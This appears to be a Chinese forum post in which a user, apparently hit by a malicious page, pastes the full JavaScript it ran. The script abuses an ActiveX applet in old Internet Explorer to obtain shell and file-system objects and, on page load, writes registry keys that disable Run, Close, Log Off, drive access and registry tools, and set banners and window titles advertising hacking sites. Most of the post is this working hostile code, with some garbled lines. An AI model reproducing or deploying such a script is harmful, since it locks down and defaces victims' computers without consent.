- 分享
- 0
- 人气
- 7
- 主题
- 13
- 帖子
- 1837
- UID
- 76124
- 积分
- 2113
- 阅读权限
- 20
- 注册时间
- 2007-5-6
- 最后登录
- 2018-4-22
- 在线时间
- 1487 小时
|
刚刚中。。。。。
修复中。。。。。
- <SCRIPT language=JavaScript>
- document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
- function AddFavLnk(loc, DispName, SiteURL)
- {
- var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
- Shor.TargetPath = SiteURL;
- Shor.Save();
- }
- function f(){
- try
- {
- ActiveX initialization
- a1=document.applets[0];
- a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
- a1.createInstance();
- Shl = a1.GetObject();
- a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
- a1.createInstance();
- FSO = a1.GetObject();
- a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
- a1.createInstance();
- Net = a1.GetObject();
- try
- {
- if (documents .cookies.indexOf("Chg") == -1)
- {
- file://Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://com.6to23.com/");
- var expdate = new Date((new Date()).getTime() + (1));
- documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"); file:
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY"); file:
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"); file:
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "63000000", "REG_DWORD"); file:
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD"); file:
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
- Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "您的计算机已经被[url]http://www.cnhack.org/[/url]优化: )");
- Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "您的计算机已经被[url]http://www.cnhack.org/[/url]优化: )");
- file:
- Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★[url]http://com.6to23.com/[/url] & [url]http://www.cnhack.org/[/url]");
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★[url]http://com.6to23.com/[/url] & [url]http://www.cnhack.org/[/url]");
- file:
- var expdate = new Date((new Date()).getTime() + (1));
- documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
- }
- }
- catch(e)
- {}
- }
- catch(e)
- {}
- }
- function init()
- {
- setTimeout("f()", 1000);
- }
- init();</SCRIPT>
复制代码 |
|